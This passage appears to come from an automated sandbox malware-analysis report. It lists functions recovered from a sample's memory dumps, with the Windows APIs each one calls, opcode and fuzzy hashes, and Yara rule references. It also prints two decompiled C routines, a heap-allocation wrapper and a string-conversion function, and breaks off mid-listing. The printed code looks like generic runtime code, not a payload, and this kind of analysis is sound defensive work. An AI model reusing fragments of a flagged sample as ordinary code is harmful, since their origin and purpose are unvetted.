                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateFromIconResource
                                                                    • String ID:
                                                                    • API String ID: 3668623891-0
                                                                    • Opcode ID: ef24375a0c8b54f24ba64c3931d999d6e592c0e7d82fb637e7527157c9198b0d
                                                                    • Instruction ID: 86a86f1be5c3f262bba12eeb9ac5a27cc7d4d3bf24167a99541db263ada74a9c
                                                                    • Opcode Fuzzy Hash: ef24375a0c8b54f24ba64c3931d999d6e592c0e7d82fb637e7527157c9198b0d
                                                                    • Instruction Fuzzy Hash: 431123B180024A9FDF10CFAAD844BDEBBF8EB48320F14841AE964A3610C375A954DFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 050932D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,047F53E8,00000000,?), ref: 0509E73D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: b69ad68feae1f7d8d71ff1f926d8a3a26f9d523935dc8684dc47b66325384ba7
                                                                    • Instruction ID: 6ab3930459d9b16e88309ed17df4c4784e5dbb35f05225f75ef9b1634f0a73ce
                                                                    • Opcode Fuzzy Hash: b69ad68feae1f7d8d71ff1f926d8a3a26f9d523935dc8684dc47b66325384ba7
                                                                    • Instruction Fuzzy Hash: 881125B5900249DFDB10CF99D885BEEFBF8FB48324F10841AE954A3640D378A944DFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0509E6D8, Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,047F53E8,00000000,?), ref: 0509E73D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: 72e1052060f0306361ac6be5b159bed039b2cadfd658dd33ffe9de875071ebf1
                                                                    • Instruction ID: 110fdabcf0096c34f71b28385cfa3c7c7e91d8b4e6abc4178ff3368774fe01ac
                                                                    • Opcode Fuzzy Hash: 72e1052060f0306361ac6be5b159bed039b2cadfd658dd33ffe9de875071ebf1
                                                                    • Instruction Fuzzy Hash: 501128B5800249DFDB10CF99D885BDEFBF8FB49314F14845AE854A3641D378A944DFA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05246833, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 05246890
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302172975.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    • Opcode ID: 894874adc9f0cfd54d4062d3cd0ece441fa6ffa58f6bf20deb3658bc74eb7c23
                                                                    • Instruction ID: afa0da1526c5c6cf6094f5c6d4fdf7220ea8aebfb4ce9e0314979d2b55eeed9f
                                                                    • Opcode Fuzzy Hash: 894874adc9f0cfd54d4062d3cd0ece441fa6ffa58f6bf20deb3658bc74eb7c23
                                                                    • Instruction Fuzzy Hash: 901133B6C002099FCB10CF99C485BDEBBF4EF49324F14842AD868A7740D378A948CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D695C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 04D6962E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 9df4097ddd0836c70611bce2b5cfaf6c0b7c77de4a6fec67e4faf4b0249c7158
                                                                    • Instruction ID: 4bfef1c3225e0c027141446c9fc1847a7f696294626273eeb95d4b36e3068733
                                                                    • Opcode Fuzzy Hash: 9df4097ddd0836c70611bce2b5cfaf6c0b7c77de4a6fec67e4faf4b0249c7158
                                                                    • Instruction Fuzzy Hash: 2311DFB5D002498FDB10CF9AD444BDEFBF4AB89314F14855AD829A7600D374A545CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05246838, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 05246890
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302172975.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    • Opcode ID: 12859944096b888d5b67dc15b2c8b1ffe5263aec80ca8ddd76cf354eea263c8d
                                                                    • Instruction ID: 82c85b282abeb587586f1308fe7c67b87f7be9cb478065ae4d20cc7816d48241
                                                                    • Opcode Fuzzy Hash: 12859944096b888d5b67dc15b2c8b1ffe5263aec80ca8ddd76cf354eea263c8d
                                                                    • Instruction Fuzzy Hash: C41133B1C002098FCB10CF99C485BDEBBF4EF48320F10842AD868A7740D378A948CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0509A548, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,?,?,?,?,?,?,0509BC49,?,?,00000000), ref: 0509BCBD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: ad51192e364b0c7a17cba33b59ff88b67879ad78abc20b97c2445de77e13a303
                                                                    • Instruction ID: c00356cb1a0dd7725b12e66775cd5c4f39dcdb1df47078330760ae345f59f91b
                                                                    • Opcode Fuzzy Hash: ad51192e364b0c7a17cba33b59ff88b67879ad78abc20b97c2445de77e13a303
                                                                    • Instruction Fuzzy Hash: 7611F2B5904249DFDB10CF99E885BDEBBF8EB48324F10841AE955B7740D374A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05091540, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,0509226A,?,00000000,?), ref: 0509C435
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 8f8a0de10d2899980b42eb39552833cf03d001f18b471ed0045af5e10c551f6b
                                                                    • Instruction ID: 8651147fb411dcec5ebca9ba7743162f62ce369cc0aea5abc7583dabb603d924
                                                                    • Opcode Fuzzy Hash: 8f8a0de10d2899980b42eb39552833cf03d001f18b471ed0045af5e10c551f6b
                                                                    • Instruction Fuzzy Hash: 1A11F2B5D002499FEB10CF99D885BEEBBF8FB49314F10851AE855B7640D3B4A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 050950D4, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000018,00000001,?), ref: 0509D29D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: 85bf8e1e812d4d79bf80185284f667a92bbbf1b53a564844b2e28fcb37a1ddc1
                                                                    • Instruction ID: 1712ef9b2736b72e9467a33785902948e60f6bab76ff9c485f8505c0d3cf5927
                                                                    • Opcode Fuzzy Hash: 85bf8e1e812d4d79bf80185284f667a92bbbf1b53a564844b2e28fcb37a1ddc1
                                                                    • Instruction Fuzzy Hash: 2B11F2B68002499FDB10CF99D985BDEFBF8EB59314F10841AE815B7600D3B4A984CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0509D238, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000018,00000001,?), ref: 0509D29D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: d2455486b3de261db9a83d36301e801d052a27f450d24790bf5c95259405b3a7
                                                                    • Instruction ID: c9355dd697375f9241f4da210621a91aa5d95c8336e62f7be64dc7b5a624ae51
                                                                    • Opcode Fuzzy Hash: d2455486b3de261db9a83d36301e801d052a27f450d24790bf5c95259405b3a7
                                                                    • Instruction Fuzzy Hash: A511F5B58002499FDB10CF99D885BDEFFF8EB59310F10841AE854A3640C374A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05240438, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302172975.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DispatchMessage
                                                                    • String ID:
                                                                    • API String ID: 2061451462-0
                                                                    • Opcode ID: f12ec77793e7703bb4984dd9b4b7da2619c52fd7fd9ec28d57587e5b233830fb
                                                                    • Instruction ID: ee1428986a961fefe237b342f0231f08c0ef6e0c453f588c65c82c764b66e2d8
                                                                    • Opcode Fuzzy Hash: f12ec77793e7703bb4984dd9b4b7da2619c52fd7fd9ec28d57587e5b233830fb
                                                                    • Instruction Fuzzy Hash: BD1110B1C006499FDB10CFAAD448BDEFBF4EB48314F10851AD419B7600D378A544CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0509C3D0, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,0509226A,?,00000000,?), ref: 0509C435
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 265fd5232967e35776a63b6815a63482a876faae331f2ec6351db0960b6ac435
                                                                    • Instruction ID: c3a840d8513a47a07308f510c500e12f43ea4670dc2f92904066fd0042599afb
                                                                    • Opcode Fuzzy Hash: 265fd5232967e35776a63b6815a63482a876faae331f2ec6351db0960b6ac435
                                                                    • Instruction Fuzzy Hash: 9F11F2B59002499FDB10CF99D885BDEBBF8FB59324F10881AE854A3600D3B4A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04D6FE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?), ref: 04D6FE9D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.299937147.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: 2648f67ef995ca526c41e75c0c98a0ace3d586e5e0584ff347bb6643e6c47e1c
                                                                    • Instruction ID: fea4c5382a6ed11ec88613c89ef4e414627b6388029ddba036810c31b4975512
                                                                    • Opcode Fuzzy Hash: 2648f67ef995ca526c41e75c0c98a0ace3d586e5e0584ff347bb6643e6c47e1c
                                                                    • Instruction Fuzzy Hash: 241100B58002499FDB10CF99D485BDEFBF8EB48324F10851AE819A3701C374A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05240440, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302172975.0000000005240000.00000040.00000001.sdmp, Offset: 05240000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DispatchMessage
                                                                    • String ID:
                                                                    • API String ID: 2061451462-0
                                                                    • Opcode ID: 6675b95229bb7238c766032872b88ada626a08351ae839574c1abe430de1f407
                                                                    • Instruction ID: 0b1b0f5903b9b2ea2ea407b7ebd19797ea6308c6af6fcb07024e3915ca2766d2
                                                                    • Opcode Fuzzy Hash: 6675b95229bb7238c766032872b88ada626a08351ae839574c1abe430de1f407
                                                                    • Instruction Fuzzy Hash: A811FEB1C006498FCB10CFAAD444BCEFBF4EB48314F10852AD829A7600D378A544CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0509BC59, Relevance: 1.5, APIs: 1, Instructions: 41windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,?,?,?,?,?,?,0509BC49,?,?,00000000), ref: 0509BCBD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.302055612.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 1e276a3fd27a4db1d3508b0bec28a20e5ebd3a47bcf6f56c0ca165a3629d325c
                                                                    • Instruction ID: eb0329b0ec5f6e34c4987e2cf4957341f17852ee9ff6bc1ae9033da06a6e8ede
                                                                    • Opcode Fuzzy Hash: 1e276a3fd27a4db1d3508b0bec28a20e5ebd3a47bcf6f56c0ca165a3629d325c
                                                                    • Instruction Fuzzy Hash: B81100B58003498FDB10CF99E485BDEFBF4EB48324F10841AD958A3740D374AA44CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                                                                    0x00403e3d
                                                                    0x00403e43
                                                                    0x00403e49
                                                                    0x00403e7b
                                                                    0x00403e80
                                                                    0x00403e86
                                                                    0x00000000
                                                                    0x00403e86
                                                                    0x00403e4d
                                                                    0x00403e4f
                                                                    0x00403e4f
                                                                    0x00403e66
                                                                    0x00403e6f
                                                                    0x00403e77
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403e57
                                                                    0x00403e59
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403e5c
                                                                    0x00403e61
                                                                    0x00403e62
                                                                    0x00403e64
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403e64
                                                                    0x00000000

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                    • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                                                                    • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                    • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0090D5B0, Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298421259.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 13bdc0c89555143cc5dd9a115c01d87bee8f316089e3ea8b302d091f6c933229
                                                                    • Instruction ID: 94a0ea3957992b427f50daed5af802b74789180628bebbb39b3a29e0be8aed9f
                                                                    • Opcode Fuzzy Hash: 13bdc0c89555143cc5dd9a115c01d87bee8f316089e3ea8b302d091f6c933229
                                                                    • Instruction Fuzzy Hash: FC210371504240EFCF04CF50D8C0B66BF69FB98324F208969E8090B68AC33AD845DBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0091D1D4, Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298440225.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b84818eaa022906385b32fbc79553f9e13527adb55c3591f16c085481cf36dfb
                                                                    • Instruction ID: 967aa93ad99569a988a826177e69a5b01af4148787db1382d06a12638e566c9e
                                                                    • Opcode Fuzzy Hash: b84818eaa022906385b32fbc79553f9e13527adb55c3591f16c085481cf36dfb
                                                                    • Instruction Fuzzy Hash: 1B21B371604248AFDB05CF14D9C0B96BBA5FB84314F24CE6DD8694B755C33AD886CAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0091D01C, Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298440225.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 73d7270154aff72113de69192768315dc6d3958d51a8e9ee502de93a45ae35b2
                                                                    • Instruction ID: 6990aac0274b771921880035d0d319868b32539f78f6c28397306e8b6d5a42ca
                                                                    • Opcode Fuzzy Hash: 73d7270154aff72113de69192768315dc6d3958d51a8e9ee502de93a45ae35b2
                                                                    • Instruction Fuzzy Hash: 4021C275604248EFDB14CF24D9C4BA6BB69FB88314F24C96DD8494B746C33AD886CAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0091D006, Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298440225.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b7a585a6ef22d4a4270149f1dfe861dfa0e7e6a9417539e36edf0ff2c68716e
                                                                    • Instruction ID: 319b1cdb8d5e9faae1a6176e57c46151fe7e181a733d345eb9c6ae3992d5e1f2
                                                                    • Opcode Fuzzy Hash: 2b7a585a6ef22d4a4270149f1dfe861dfa0e7e6a9417539e36edf0ff2c68716e
                                                                    • Instruction Fuzzy Hash: E72180755093C48FDB02CF24D990755BF71EB46314F28C5EAD8498B697C33AD84ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0090D5AB, Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298421259.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d30635df11a0a4441337c1596a288a2e76eda72e03be72d2606ef8ea09213f5
                                                                    • Instruction ID: a0ef57d45de4d37fd088c93559a60c38d762ced616fd697220142281877cc5f3
                                                                    • Opcode Fuzzy Hash: 8d30635df11a0a4441337c1596a288a2e76eda72e03be72d2606ef8ea09213f5
                                                                    • Instruction Fuzzy Hash: 2B11D376404280DFCF11CF50D9C4B16BF72FB94324F24C6A9D8094B656C336D856CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0091D1CF, Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298440225.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 368b5f16432069a8443523713166230eae48744dfbf47c59ed69e4d46d149b90
                                                                    • Instruction ID: 775a70551647ac7228b8bedc4dd6a18d905952d87983f58bc985d60d8184796a
                                                                    • Opcode Fuzzy Hash: 368b5f16432069a8443523713166230eae48744dfbf47c59ed69e4d46d149b90
                                                                    • Instruction Fuzzy Hash: E111DD75A04284DFDB01CF10D5C0B55FBB1FB84314F24CAAED8594B656C33AD84ACB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0090D01D, Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298421259.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 89776c1591cbcfe0919862a547a84ed10b792eb7cec493b60fefc6a2cbc00da2
                                                                    • Instruction ID: e3ac875352373ca0802a83a83fd4918b94c6ef5b9dffd10b55625fe1dcb4dfb6
                                                                    • Opcode Fuzzy Hash: 89776c1591cbcfe0919862a547a84ed10b792eb7cec493b60fefc6a2cbc00da2
                                                                    • Instruction Fuzzy Hash: D201F771506380AEE7104B61CC847A2FBACEF41764F18841AED485B6C2C7799845C6B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0090D01C, Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298421259.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5c722b1d465ee7ec2043a10a865a549fd796080587c4a2a977b28486ea2a4f50
                                                                    • Instruction ID: 45c5372b767f7920663802b4403d94da3337b885341c7fda057df593475d8f48
                                                                    • Opcode Fuzzy Hash: 5c722b1d465ee7ec2043a10a865a549fd796080587c4a2a977b28486ea2a4f50
                                                                    • Instruction Fuzzy Hash: 24F0C271405284AEEB108B15CC84BA2FBACEB41764F18C45AED484B282C3799845CAB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 70%
                                                                    			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x4f99ddef
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                                                                    0x004078d4
                                                                    0x004078d5
                                                                    0x004078d6
                                                                    0x004078dd
                                                                    0x004078e2
                                                                    0x004078e8
                                                                    0x004078ee
                                                                    0x004078f4
                                                                    0x004078f7
                                                                    0x004078f7
                                                                    0x004078fa
                                                                    0x004078fc
                                                                    0x004078fc
                                                                    0x004078fa
                                                                    0x004078fe
                                                                    0x00407903
                                                                    0x0040790a
                                                                    0x0040790d
                                                                    0x0040790d
                                                                    0x00407929
                                                                    0x0040792f
                                                                    0x00407934
